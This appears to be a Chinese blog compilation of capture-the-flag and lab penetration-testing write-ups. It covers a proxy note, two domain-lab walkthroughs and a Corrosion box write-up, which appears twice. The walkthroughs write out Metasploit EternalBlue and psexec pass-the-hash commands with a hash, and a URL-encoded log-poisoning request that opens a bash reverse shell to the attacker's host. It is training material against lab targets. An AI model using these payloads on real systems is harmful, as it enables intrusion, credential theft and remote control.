内网代理搭建

前言 在adwp或者adw赛制中当我们打进内网时(前提是打进去，这就不得不提ccb了😭)，搭建代理是必不可少的一部分 介绍几种简单的方法 内网穿透 frp 有公网ip的话可以试试frp 有时间补上(狗头)🐶 花生壳内网穿透 没有公网ip的话就直接使用花生壳吧 官网 简单无脑一看就会 端口转发 使用iptable可以转发但是够简单，有没有简单又方便的方法的呢 ...

Lab4_wp

Lab4 _WP

一、初始信息收集

• VPN连接后访问网页，发现返回 404。
• 使用 fscan 进行信息收集。
• 
• 最终发现网页服务运行在 192.168.10.10:3590。
• 

二、获取初始权限

• 访问后台管理界面，猜测为/admin，尝试默认账号密码 admin/tao 成功登录。
• 上传一句话木马，获取 WebShell，拿到第一个 flag。
• 
• 使用 Cobalt Strike（CS）上线。
• 

三、横向移动准备

• 开放目标主机的 3389 端口，并添加管理员账户。
• 
• 
• 
• 通过远程桌面进行信息收集，发现目标为双网卡主机。
• 
• 使用 fscan 对内网进一步扫描。
• 
• 

四、横向渗透

• 使用 Stowaway 搭建代理通道。
• 
• 访问内网地址 192.168.20.20:8055。
• 
• 根据题目提示，爆破遗留木马密码。
• 
• 
• 成功使用蚁剑连接，获取第二个 flag。
• 

五、域控提权

• 使用 Metasploit 尝试利用 MS17-010，利用失败。
• 
• 改用 CVE-2020-1472（ZeroLogon）对域控进行提权。
• 
• 成功抓取域控机器的 hash 值。
• 

六、PTH 攻击（Pass-the-Hash）

• 使用抓取到的 hash 值进行 PTH 攻击。
• 
• 成功获取第三个 flag。
• 

总结：

本次实验通过信息收集、权限提升、内网横向与域控提权等手段，完整完成三枚 flag 的获取过程。

Lab1_wp

VPN连接后初始探测

• 连接 OpenVPN 后，发现目标使用 易优CMS 框架。
• 

信息收集

• 使用 fscan 工具进行信息收集。
• 
• 发现存在 ThinkPHP 5.0.23 的 RCE 漏洞，使用工具进行验证
• 
• 但无法getshell
• 

易优CMS 漏洞利用

• 网上搜索易优CMS相关漏洞，发现一个 Nday 漏洞，支持从前台 getshell。
• 
• 编写 POC，将一句话木马 使用 Base64 编码写入。
• 

木马连接

• 使用 蚁剑（AntSword） 连接成功。
• 找到第一个 flag。
• 
• 

权限提升

• 创建管理员用户，并打开 3389 远程桌面端口。
• 
• 
• 
• 成功远程连接桌面，上线 Cobalt Strike。
• 

内网横向

• 通过信息收集发现目标为 双网卡机器。
• 
• 使用 fscan 对内网进行扫描，发现192.168.20.20的主机为域控
• 
• 配置 frp 内网代理。
• 
• 配置代理环境，进入 msfconsole。
• 

永恒之蓝（MS17-010）利用

• 探测到目标存在 MS17-010 漏洞

• 

  利用模块如下：

use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.20.30
set PAYLOAD windows/x64/meterpreter/bind_tcp  # 使用正向连接（目标在内网）
set LHOST 172.16.233.2  # 本机回连 IP（ifconfig 查看）
run

进行漏洞利用

得到第三个flag

PTH攻击

继续使用msf进行PTH攻击，得到第二个flag

use exploit/windows/smb/psexec
set RHOST 192.168.20.10
set SMBUser Administrator
set SMBPass 00000000000000000000000000000000:a167976f7bd8d93ee232fa7a87a4079e
run

Corrosion_wp

基本信息

• 靶机 IP：192.168.126.140
• 攻击机 IP：192.168.126.132

信息收集阶段

端口扫描

使用 nmap 扫描靶机所有端口

nmap -p 1-65535 192.168.126.140

结果：

• 开放端口：
  • 22/tcp（SSH）
  • 80/tcp（HTTP）
  • 

Web 服务枚举

访问 80 端口

• 页面为默认的 Ubuntu 网站。
• 

使用 Gobuster 枚举目录

gobuster dir -u http://192.168.126.140 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

发现目录：

• /tasks
• /blog-post
• 

访问 /tasks

• 存在 tasks_todo.txt 文件。
• 
• 内容涉及 SSH 的提示。
• 

访问 /blog-post

• 页面无明显信息。
• 

深入探测

​ 二次注入

• 在 /blog-post/archives 目录中手动点击各个链接。
• 
• 发现 randylogs.php，页面为空白。
• 

使用 ffuf 模糊测试

ffuf -u http://192.168.126.140/blog-post/archives/randylogs.php?file=FUZZ -w /usr/share/wordlists/dirb/common.txt

结果：

• 存在 文件包含漏洞。
• 

文件包含漏洞利用

结合前面 SSH 的提示，考虑利用 SSH 登录污染 /var/log/auth.log，然后通过文件包含执行命令。

• 参考网上相关帖子，尝试三种思路，最终发现命令执行成功。
• 
• 
• 

准备监听反弹 Shell

在攻击机上运行：

nc -lvvp 4444

发起反弹 Shell 请求（需 URL 编码）

http://192.168.126.140/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=echo%20%22bash%20-i%20%3E%26%20/dev/tcp/192.168.126.132/4444%200%3E%261%22%20%7C%20bash

效果：

• 成功反弹 shell。
• 

获取用户权限

查看目录结构

• 发现 /backups 目录。
• 其中包含 user_backup.zip 文件。
• 

下载 zip 文件

使用 Python 启动 HTTP 服务：

python3 -m http.server 80

浏览器访问：

http://192.168.126.140/backups/user_backup.zip

破解 ZIP 密码

zip2john user_backup.zip > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

• 成功爆破出密码。
• 

解压并查看内容

• 获得 Randy 用户的登录密码。
• 

使用 SSH 登录

ssh randy@192.168.126.140

• 
• 成功登录。

id

• 确认为普通用户。
• 

查看用户 flag

cat user.txt

• 成功获取 flag
• 

总结

• 利用文件包含漏洞结合日志注入成功反弹 shell。
• 破解备份文件获得 SSH 凭据，成功登录。
• 获取 user.txt，完成用户权限阶段目标。
  
  渗透测试记录报告

基本信息

• 靶机 IP：192.168.126.140
• 攻击机 IP：192.168.126.132

信息收集阶段

端口扫描

使用 nmap 扫描靶机所有端口

image-20250407181941151

nmap -p 1-65535 192.168.126.140

结果：

• 开放端口：
• 22/tcp（SSH）
• 80/tcp（HTTP）
• image-20250407181953358

Web 服务枚举

访问 80 端口

• 页面为默认的 Ubuntu 网站。
• image-20250407182058505

使用 Gobuster 枚举目录

gobuster dir -u http://192.168.126.140 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

发现目录：

• /tasks
• /blog-post
• image-20250407182113933

访问 /tasks

• 存在 tasks_todo.txt 文件。
• image-20250407182127446
• 内容涉及 SSH 的提示。
• image-20250407182136627

访问 /blog-post

• 页面无明显信息。
• image-20250407182147147

深入探测

二次注入

image-20250407182210706

• 在 /blog-post/archives 目录中手动点击各个链接。
• image-20250407182300274
• 发现 randylogs.php，页面为空白。
• image-20250407182312552

使用 ffuf 模糊测试

ffuf -u http://192.168.126.140/blog-post/archives/randylogs.php?file=FUZZ -w /usr/share/wordlists/dirb/common.txt

image-20250407182347710

结果：

• 存在 文件包含漏洞。
• image-20250407182359469

文件包含漏洞利用

结合前面 SSH 的提示，考虑利用 SSH 登录污染 /var/log/auth.log，然后通过文件包含执行命令。

image-20250407182410434

• 参考网上相关帖子，尝试三种思路，最终发现命令执行成功。
• image-20250407182419748
• image-20250407182441485
• image-20250407182456203

准备监听反弹 Shell

在攻击机上运行：

nc -lvvp 4444

发起反弹 Shell 请求（需 URL 编码）

http://192.168.126.140/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=echo%20%22bash%20-i%20%3E%26%20/dev/tcp/192.168.126.132/4444%200%3E%261%22%20%7C%20bash

效果：

• 成功反弹 shell。
• image-20250407182516742

获取用户权限

查看目录结构

• 发现 /backups 目录。
• 其中包含 user_backup.zip 文件。
• 

下载 zip 文件

使用 Python 启动 HTTP 服务：

python3 -m http.server 80

image-20250407182714665

浏览器访问：

http://192.168.126.140/backups/user_backup.zip

image-20250407182730112
破解 ZIP 密码

zip2john user_backup.zip > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

• 成功爆破出密码。
• image-20250407182743041

解压并查看内容

• 获得 Randy 用户的登录密码。
• image-20250407182752561

使用 SSH 登录

ssh randy@192.168.126.140

• image-20250407182808547
• 成功登录。

id

• 确认为普通用户。
• image-20250407182821340

查看用户 flag

cat user.txt

• 成功获取 flag
• image-20250407182836566

总结

• 利用文件包含漏洞结合日志注入成功反弹 shell。
• 破解备份文件获得 SSH 凭据，成功登录。
• 获取 user.txt，完成用户权限阶段目标。